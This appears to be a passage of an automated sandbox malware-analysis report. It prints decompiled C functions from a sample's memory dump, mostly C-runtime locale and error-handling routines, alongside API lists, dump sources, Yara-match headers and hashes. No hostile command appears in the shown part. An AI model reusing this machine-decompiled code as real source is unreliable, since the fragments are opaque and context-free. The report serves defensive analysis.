                    0x0140fb9e
                    0x0140fb69
                    0x0140fbb0
                    0x0140fb4c
                    0x0140fb4c
                    0x0140fb4e
                    0x0140fb4e
                    0x0140fbc3

                    APIs
                      • Part of subcall function 01406A01: GetLastError.KERNEL32(00000000,?,013FEF5F,?,00000000,?,013FECA1,00000000,00000000,00000000,00000000,0141BE7F,00000000,00000000,00000000,?), ref: 01406A05
                      • Part of subcall function 01406A01: _free.LIBCMT ref: 01406A38
                      • Part of subcall function 01406A01: SetLastError.KERNEL32(00000000,013FECA1,00000000,00000000,00000000,00000000,0141BE7F,00000000,00000000,00000000,?), ref: 01406A79
                      • Part of subcall function 01406A01: _abort.LIBCMT ref: 01406A7F
                      • Part of subcall function 01406A01: _free.LIBCMT ref: 01406A60
                      • Part of subcall function 01406A01: SetLastError.KERNEL32(00000000,013FECA1,00000000,00000000,00000000,00000000,0141BE7F,00000000,00000000,00000000,?), ref: 01406A6D
                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0140FB42
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$_free$InfoLocale_abort
                    • String ID:
                    • API String ID: 1663032902-0
                    • Opcode ID: defa8b3fe2b8c7613ecacc26065a6d14f2884b50b4c2226690756e5e5163fbb7
                    • Instruction ID: a13fbc8f5f1f20d013ac4866497c7e45d4ca79fe231640538934ff9c7ad6c294
                    • Opcode Fuzzy Hash: defa8b3fe2b8c7613ecacc26065a6d14f2884b50b4c2226690756e5e5163fbb7
                    • Instruction Fuzzy Hash: D121A4325106079BEB36AA2ADC51BBB77B8EF14310F1001BBED01C6291EB75AD49CB50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 91%
                    			E0140F776(void* __ecx, void* __edx, signed int* _a4) {
                    				void* __ebx;
                    				intOrPtr _t26;
                    				intOrPtr _t29;
                    				signed int _t32;
                    				signed char _t33;
                    				signed char _t34;
                    				void* _t36;
                    				intOrPtr* _t39;
                    				intOrPtr* _t42;
                    				signed int _t48;
                    				void* _t51;
                    				void* _t52;
                    				signed int* _t53;
                    				void* _t54;
                    				signed int _t62;
                    
                    				_t54 = E01406A01(_t36, __ecx, __edx);
                    				_t48 = 2;
                    				_t39 =  *((intOrPtr*)(_t54 + 0x50));
                    				_t51 = _t39 + 2;
                    				do {
                    					_t26 =  *_t39;
                    					_t39 = _t39 + _t48;
                    				} while (_t26 != 0);
                    				_t42 =  *((intOrPtr*)(_t54 + 0x54));
                    				 *(_t54 + 0x60) = 0 | _t39 - _t51 >> 0x00000001 == 0x00000003;
                    				_t52 = _t42 + 2;
                    				do {
                    					_t29 =  *_t42;
                    					_t42 = _t42 + _t48;
                    				} while (_t29 != 0);
                    				_t53 = _a4;
                    				 *(_t54 + 0x64) = 0 | _t42 - _t52 >> 0x00000001 == 0x00000003;
                    				_t53[1] = 0;
                    				if( *(_t54 + 0x60) == 0) {
                    					_t48 = E0140F872( *((intOrPtr*)(_t54 + 0x50)));
                    				}
                    				 *(_t54 + 0x5c) = _t48;
                    				_t32 = EnumSystemLocalesW(E0140F89E, 1);
                    				_t62 =  *_t53 & 0x00000007;
                    				asm("bt ecx, 0x9");
                    				_t33 = _t32 & 0xffffff00 | _t62 > 0x00000000;
                    				asm("bt ecx, 0x8");
                    				_t34 = _t33 & 0xffffff00 | _t62 > 0x00000000;
                    				if((_t34 & (_t48 & 0xffffff00 | _t62 != 0x00000000) & _t33) == 0) {
                    					 *_t53 = 0;
                    					return _t34;
                    				}
                    				return _t34;
                    			}


















                    0x0140f783
                    0x0140f789
                    0x0140f78a
                    0x0140f78d
                    0x0140f790
                    0x0140f790
                    0x0140f793
                    0x0140f795
                    0x0140f7a3
                    0x0140f7a9
                    0x0140f7ac
                    0x0140f7af
                    0x0140f7af
                    0x0140f7b2
                    0x0140f7b4
                    0x0140f7bd
                    0x0140f7c8
                    0x0140f7cb
                    0x0140f7d1
                    0x0140f7dc
                    0x0140f7dc
                    0x0140f7e5
                    0x0140f7e8
                    0x0140f7f0
                    0x0140f7f6
                    0x0140f7fa
                    0x0140f7ff
                    0x0140f803
                    0x0140f808
                    0x0140f80a
                    0x00000000
                    0x0140f80a
                    0x0140f810

                    APIs
                      • Part of subcall function 01406A01: GetLastError.KERNEL32(00000000,?,013FEF5F,?,00000000,?,013FECA1,00000000,00000000,00000000,00000000,0141BE7F,00000000,00000000,00000000,?), ref: 01406A05
                      • Part of subcall function 01406A01: _free.LIBCMT ref: 01406A38
                      • Part of subcall function 01406A01: SetLastError.KERNEL32(00000000,013FECA1,00000000,00000000,00000000,00000000,0141BE7F,00000000,00000000,00000000,?), ref: 01406A79
                      • Part of subcall function 01406A01: _abort.LIBCMT ref: 01406A7F
                    • EnumSystemLocalesW.KERNEL32(0140F89E,00000001,00000000,?,014050D7,?,0140FECB,00000000,?,?,?), ref: 0140F7E8
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$EnumLocalesSystem_abort_free
                    • String ID:
                    • API String ID: 1084509184-0
                    • Opcode ID: c38ee0523ec875d022e4e97b589686000d1a0353e4d44dfd86cfa467e6a3147e
                    • Instruction ID: 3602d379683ba7882f0c2a1bfbaf05fc292ab28e966986e1468b4fda4b24404a
                    • Opcode Fuzzy Hash: c38ee0523ec875d022e4e97b589686000d1a0353e4d44dfd86cfa467e6a3147e
                    • Instruction Fuzzy Hash: 531129376007015FDB299F3AC8905BAB791FF80358B15443ED94687B90D371B946CB40
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 93%
                    			E0140FD1E(void* __ebx, signed int _a4, intOrPtr _a8) {
                    				short _v8;
                    				void* __ecx;
                    				void* _t8;
                    				void* _t12;
                    				intOrPtr _t13;
                    				void* _t16;
                    				void* _t20;
                    				void* _t22;
                    				void* _t24;
                    				signed int _t27;
                    				intOrPtr* _t29;
                    
                    				_push(_t16);
                    				_t8 = E01406A01(__ebx, _t16, _t22);
                    				_t27 = _a4;
                    				_t24 = _t8;
                    				if(GetLocaleInfoW(_t27 & 0x000003ff | 0x00000400, 0x20000001,  &_v8, 2) != 0) {
                    					if(_t27 == _v8 || _a8 == 0) {
                    						L7:
                    						_t12 = 1;
                    					} else {
                    						_t29 =  *((intOrPtr*)(_t24 + 0x50));
                    						_t20 = _t29 + 2;
                    						do {
                    							_t13 =  *_t29;
                    							_t29 = _t29 + 2;
                    						} while (_t13 != 0);
                    						if(E0140F872( *((intOrPtr*)(_t24 + 0x50))) == _t29 - _t20 >> 1) {
                    							goto L1;
                    						} else {
                    							goto L7;
                    						}
                    					}
                    				} else {
                    					L1:
                    					_t12 = 0;
                    				}
                    				return _t12;
                    			}














                    0x0140fd23
                    0x0140fd26
                    0x0140fd2b
                    0x0140fd2e
                    0x0140fd52
                    0x0140fd5b
                    0x0140fd85
                    0x0140fd87
                    0x0140fd63
                    0x0140fd63
                    0x0140fd66
                    0x0140fd69
                    0x0140fd69
                    0x0140fd6c
                    0x0140fd6f
                    0x0140fd83
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0140fd83
                    0x0140fd54
                    0x0140fd54
                    0x0140fd54
                    0x0140fd54
                    0x0140fd8d

                    APIs
                      • Part of subcall function 01406A01: GetLastError.KERNEL32(00000000,?,013FEF5F,?,00000000,?,013FECA1,00000000,00000000,00000000,00000000,0141BE7F,00000000,00000000,00000000,?), ref: 01406A05
                      • Part of subcall function 01406A01: _free.LIBCMT ref: 01406A38
                      • Part of subcall function 01406A01: SetLastError.KERNEL32(00000000,013FECA1,00000000,00000000,00000000,00000000,0141BE7F,00000000,00000000,00000000,?), ref: 01406A79
                      • Part of subcall function 01406A01: _abort.LIBCMT ref: 01406A7F
                    • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0140FB99,00000000,00000000,?), ref: 0140FD4A
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$InfoLocale_abort_free
                    • String ID:
                    • API String ID: 2692324296-0
                    • Opcode ID: 91bffdf229385e5ed7a09b3d879186acf3dde07d5754ab6bb65f847041bedf07
                    • Instruction ID: 1b928e34724bc6ab36353bde0818b18284da6f45e624a33a6bf53da868cc1ed9
                    • Opcode Fuzzy Hash: 91bffdf229385e5ed7a09b3d879186acf3dde07d5754ab6bb65f847041bedf07
                    • Instruction Fuzzy Hash: 6FF0F936500116ABEB366A6BCC05BBB7B68EF40764F15447ADD16A32E0EA30FD47C6D0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 92%
                    			E0140F682(void* __ecx, void* __edx, intOrPtr _a4) {
                    				signed int _v8;
                    				short _v248;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				signed int _t11;
                    				signed int _t17;
                    				void* _t26;
                    				void* _t27;
                    				signed int* _t40;
                    				int _t42;
                    				signed int _t43;
                    
                    				_t11 =  *0x1435234; // 0x78d9f939
                    				_v8 = _t11 ^ _t43;
                    				_t27 = E01406A01(_t26, __ecx, __edx);
                    				_t40 =  *(E01406A01(_t27, __ecx, __edx) + 0x34c);
                    				_t42 = E0140FBC6(_a4);
                    				asm("sbb ecx, ecx");
                    				_t17 = GetLocaleInfoW(_t42, ( ~( *(_t27 + 0x64)) & 0xfffff005) + 0x1002,  &_v248, 0x78);
                    				if(_t17 != 0) {
                    					if(E0140C591(_t27, _t40, _t42,  *((intOrPtr*)(_t27 + 0x54)),  &_v248) == 0 && E0140FCFA(_t42) != 0) {
                    						 *_t40 =  *_t40 | 0x00000004;
                    						_t40[2] = _t42;
                    						_t40[1] = _t42;
                    					}
                    					_t23 =  !( *_t40 >> 2) & 0x00000001;
                    				} else {
                    					 *_t40 =  *_t40 & _t17;
                    					_t23 = _t17 + 1;
                    				}
                    				return E013F268B(_t23, _v8 ^ _t43);
                    			}
















                    0x0140f68d
                    0x0140f694
                    0x0140f6a2
                    0x0140f6aa
                    0x0140f6b9
                    0x0140f6c5
                    0x0140f6d6
                    0x0140f6de
                    0x0140f6f8
                    0x0140f705
                    0x0140f708
                    0x0140f70b
                    0x0140f70b
                    0x0140f715
                    0x0140f6e0
                    0x0140f6e0
                    0x0140f6e2
                    0x0140f6e2
                    0x0140f728

                    APIs
                      • Part of subcall function 01406A01: GetLastError.KERNEL32(00000000,?,013FEF5F,?,00000000,?,013FECA1,00000000,00000000,00000000,00000000,0141BE7F,00000000,00000000,00000000,?), ref: 01406A05
                      • Part of subcall function 01406A01: _free.LIBCMT ref: 01406A38
                      • Part of subcall function 01406A01: SetLastError.KERNEL32(00000000,013FECA1,00000000,00000000,00000000,00000000,0141BE7F,00000000,00000000,00000000,?), ref: 01406A79
                      • Part of subcall function 01406A01: _abort.LIBCMT ref: 01406A7F
                      • Part of subcall function 01406A01: _free.LIBCMT ref: 01406A60
                      • Part of subcall function 01406A01: SetLastError.KERNEL32(00000000,013FECA1,00000000,00000000,00000000,00000000,0141BE7F,00000000,00000000,00000000,?), ref: 01406A6D
                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,014050DE,00000000,014051FE), ref: 0140F6D6
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$_free$InfoLocale_abort
                    • String ID:
                    • API String ID: 1663032902-0
                    • Opcode ID: a3a470958a9e504b90101e9418bf4b68f04aa3edf9ea2c0125ccf3030319b8be
                    • Instruction ID: 519f17cc103f0d271665cd763ceb60c109628246063e4549bf9c8e06bb8b91bb
                    • Opcode Fuzzy Hash: a3a470958a9e504b90101e9418bf4b68f04aa3edf9ea2c0125ccf3030319b8be
                    • Instruction Fuzzy Hash: 96F0F432651106ABDB25AA7ADC44EFA33ACDB55310F0141BEE906DB290EA34AD058B90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0140F811(void* __ecx, void* __edx, signed char* _a4) {
                    				void* __ebx;
                    				intOrPtr _t11;
                    				signed int _t13;
                    				signed char* _t15;
                    				void* _t17;
                    				intOrPtr* _t20;
                    				intOrPtr _t25;
                    				void* _t26;
                    				void* _t27;
                    
                    				_t27 = E01406A01(_t17, __ecx, __edx);
                    				_t25 = 2;
                    				_t20 =  *((intOrPtr*)(_t27 + 0x50));
                    				_t26 = _t20 + 2;
                    				do {
                    					_t11 =  *_t20;
                    					_t20 = _t20 + _t25;
                    				} while (_t11 != 0);
                    				_t13 = 0 | _t20 - _t26 >> 0x00000001 == 0x00000003;
                    				 *(_t27 + 0x60) = _t13;
                    				if(_t13 == 0) {
                    					_t25 = E0140F872( *((intOrPtr*)(_t27 + 0x50)));
                    				}
                    				 *((intOrPtr*)(_t27 + 0x5c)) = _t25;
                    				EnumSystemLocalesW(E0140FAEE, 1);
                    				_t15 = _a4;
                    				if(( *_t15 & 0x00000004) == 0) {
                    					 *_t15 = 0;
                    					return _t15;
                    				}
                    				return _t15;
                    			}












                    0x0140f81e
                    0x0140f824
                    0x0140f825
                    0x0140f828
                    0x0140f82b
                    0x0140f82b
                    0x0140f82e
                    0x0140f830
                    0x0140f83e
                    0x0140f841
                    0x0140f846
                    0x0140f851
                    0x0140f851
                    0x0140f85a
                    0x0140f85d
                    0x0140f863
                    0x0140f869
                    0x0140f86b
                    0x00000000
                    0x0140f86b
                    0x0140f871

                    APIs
                      • Part of subcall function 01406A01: GetLastError.KERNEL32(00000000,?,013FEF5F,?,00000000,?,013FECA1,00000000,00000000,00000000,00000000,0141BE7F,00000000,00000000,00000000,?), ref: 01406A05
                      • Part of subcall function 01406A01: _free.LIBCMT ref: 01406A38
                      • Part of subcall function 01406A01: SetLastError.KERNEL32(00000000,013FECA1,00000000,00000000,00000000,00000000,0141BE7F,00000000,00000000,00000000,?), ref: 01406A79
                      • Part of subcall function 01406A01: _abort.LIBCMT ref: 01406A7F
                    • EnumSystemLocalesW.KERNEL32(0140FAEE,00000001,?,?,014050D7,?,0140FE8F,014050D7,?,?,?,?,?,014050D7,?,?), ref: 0140F85D
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$EnumLocalesSystem_abort_free
                    • String ID:
                    • API String ID: 1084509184-0
                    • Opcode ID: 7fcc1a64ba91cc3d5c45359384e2e2e9965c9e45ddade8f9f4590ea7f21dde43
                    • Instruction ID: f1fc93c41c31407f5b489e6a618f20207055ea0cbc44dcd74327817157ae5800
                    • Opcode Fuzzy Hash: 7fcc1a64ba91cc3d5c45359384e2e2e9965c9e45ddade8f9f4590ea7f21dde43
                    • Instruction Fuzzy Hash: BFF0C2373003055FDB366E7B9880AAB7B95EF81768B15843EE9058B6A0D771A9458A40
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 89%
                    			E01406B96(void* __eflags) {
                    				int _t15;
                    				void* _t28;
                    
                    				E013F3660(0x1433bb0, 0xc);
                    				 *(_t28 - 0x1c) =  *(_t28 - 0x1c) & 0x00000000;
                    				E01400941( *((intOrPtr*)( *((intOrPtr*)(_t28 + 8)))));
                    				 *(_t28 - 4) =  *(_t28 - 4) & 0x00000000;
                    				 *0x143a738 = E01406C42( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t28 + 0xc)))))));
                    				_t15 = EnumSystemLocalesW(E01406B50, 1);
                    				asm("ror eax, cl");
                    				 *0x143a738 = 0 ^  *0x1435234;
                    				 *(_t28 - 0x1c) = _t15;
                    				 *(_t28 - 4) = 0xfffffffe;
                    				E01406C0E();
                    				return E013F36A6(0x20);
                    			}





                    0x01406b9d
                    0x01406ba2
                    0x01406bab
                    0x01406bb1
                    0x01406bc2
                    0x01406bce
                    0x01406be5
                    0x01406bed
                    0x01406bf2
                    0x01406bf5
                    0x01406bfc
                    0x01406c08

                    APIs
                      • Part of subcall function 01400941: EnterCriticalSection.KERNEL32(?,?,0140122A,00000000,01433A08,0000000C,014011E5,?,?,?,014009E5,?,?,01406AB6,00000001,00000364), ref: 01400950
                    • EnumSystemLocalesW.KERNEL32(01406B50,00000001,01433BB0,0000000C), ref: 01406BCE
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: CriticalEnterEnumLocalesSectionSystem
                    • String ID:
                    • API String ID: 1272433827-0
                    • Opcode ID: 963e6f3caec31159bc12c0570d14adc1a8088355c7431e3141858bcd7cfe9e76
                    • Instruction ID: 945318a25a1267b861eea256765288957682e383dce332d639650293b682e2f1
                    • Opcode Fuzzy Hash: 963e6f3caec31159bc12c0570d14adc1a8088355c7431e3141858bcd7cfe9e76
                    • Instruction Fuzzy Hash: 94F06D32A542019FDB21EF6AD489B5D37F0FB14720F21806AF401DF2E4CB7489508F81
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0140F72B(void* __ecx, void* __edx, signed char* _a4) {
                    				intOrPtr _t9;
                    				signed char* _t13;
                    				void* _t14;
                    				intOrPtr* _t16;
                    				void* _t20;
                    				void* _t22;
                    
                    				_t20 = E01406A01(_t14, __ecx, __edx);
                    				_t16 =  *((intOrPtr*)(_t20 + 0x54));
                    				_t22 = _t16 + 2;
                    				do {
                    					_t9 =  *_t16;
                    					_t16 = _t16 + 2;
                    				} while (_t9 != 0);
                    				 *(_t20 + 0x64) = 0 | _t16 - _t22 >> 0x00000001 == 0x00000003;
                    				EnumSystemLocalesW(E0140F682, 1);
                    				_t13 = _a4;
                    				if(( *_t13 & 0x00000004) == 0) {
                    					 *_t13 = 0;
                    					return _t13;
                    				}
                    				return _t13;
                    			}









                    0x0140f737
                    0x0140f73b
                    0x0140f73e
                    0x0140f741
                    0x0140f741
                    0x0140f744
                    0x0140f747
                    0x0140f75f
                    0x0140f762
                    0x0140f768
                    0x0140f76e
                    0x0140f770
                    0x00000000
                    0x0140f770
                    0x0140f775

                    APIs
                      • Part of subcall function 01406A01: GetLastError.KERNEL32(00000000,?,013FEF5F,?,00000000,?,013FECA1,00000000,00000000,00000000,00000000,0141BE7F,00000000,00000000,00000000,?), ref: 01406A05
                      • Part of subcall function 01406A01: _free.LIBCMT ref: 01406A38
                      • Part of subcall function 01406A01: SetLastError.KERNEL32(00000000,013FECA1,00000000,00000000,00000000,00000000,0141BE7F,00000000,00000000,00000000,?), ref: 01406A79
                      • Part of subcall function 01406A01: _abort.LIBCMT ref: 01406A7F
                    • EnumSystemLocalesW.KERNEL32(0140F682,00000001,?,?,?,0140FEED,014050D7,?,?,?,?,?,014050D7,?,?,?), ref: 0140F762
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$EnumLocalesSystem_abort_free
                    • String ID:
                    • API String ID: 1084509184-0
                    • Opcode ID: b5bf68ea1f2253694bf9b4d6ed1ea1dfeeb27b1ec7806b4b1265839434a82734
                    • Instruction ID: ea964284cc033b509c8cc69e0b240f74ea091048ad03ee7533a755cb3216caae
                    • Opcode Fuzzy Hash: b5bf68ea1f2253694bf9b4d6ed1ea1dfeeb27b1ec7806b4b1265839434a82734
                    • Instruction Fuzzy Hash: 69F05C3930020557CB16AF3BC8146667F50FFC2754B17407DEE05CB2A1C6719947CB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 01418BD4
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: ContextCryptRelease
                    • String ID:
                    • API String ID: 829835001-0
                    • Opcode ID: 333bdf02932b156c16a451d8da2a5758ab9403fd55fdfbcd3f89b1bcd2bcdc67
                    • Instruction ID: 008a2a1c0777951f0bf5553db523e9a3e409b2f5837f4121e4e6e426fb81d960
                    • Opcode Fuzzy Hash: 333bdf02932b156c16a451d8da2a5758ab9403fd55fdfbcd3f89b1bcd2bcdc67
                    • Instruction Fuzzy Hash: B4E0C2B6A01254A7EA705E4CBC04B873B58BB00B18F180909BB40AFBA8C3B0E4814795
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 013EA323
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: ContextCryptRelease
                    • String ID:
                    • API String ID: 829835001-0
                    • Opcode ID: 2c3218327f45e68bd54fa6894e9c65eea88a7245a36c560e53d6714f94e31ce3
                    • Instruction ID: 8e6cb3ce167c4cd7f234cd5af8b7e298abcf8b0ad9d3e40c6561a4433ab420d8
                    • Opcode Fuzzy Hash: 2c3218327f45e68bd54fa6894e9c65eea88a7245a36c560e53d6714f94e31ce3
                    • Instruction Fuzzy Hash: 81D05EB174836153E2345E1C9C08B8B7EC85F21B59F58881DFA84E72D0D6B0D48583A4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 013EA300
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: ContextCryptRelease
                    • String ID:
                    • API String ID: 829835001-0
                    • Opcode ID: ba264fa80afdff680b8c02b7eed99571290dc1d4d5d7bbb8c034718e4451e89e
                    • Instruction ID: 18e1e5f36ed4779f8307d5efc28dcf59d190882dd3d693bc5ab1c93d1e044ebf
                    • Opcode Fuzzy Hash: ba264fa80afdff680b8c02b7eed99571290dc1d4d5d7bbb8c034718e4451e89e
                    • Instruction Fuzzy Hash: 00C09270B00254A7EF308E25DE8DB117EA8AB08B88F3885C8A549DB2C5CBB7D002D650
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 0
                    • API String ID: 0-4108050209
                    • Opcode ID: 265f2ed19ec5c82c5ac906a1a3a706e16a29a61a8b54f9274ac42e629da53273
                    • Instruction ID: d80405b40e1998c299ad42fcd82db3072d5c8539f814f2bcc1331c2c19eba8ec
                    • Opcode Fuzzy Hash: 265f2ed19ec5c82c5ac906a1a3a706e16a29a61a8b54f9274ac42e629da53273
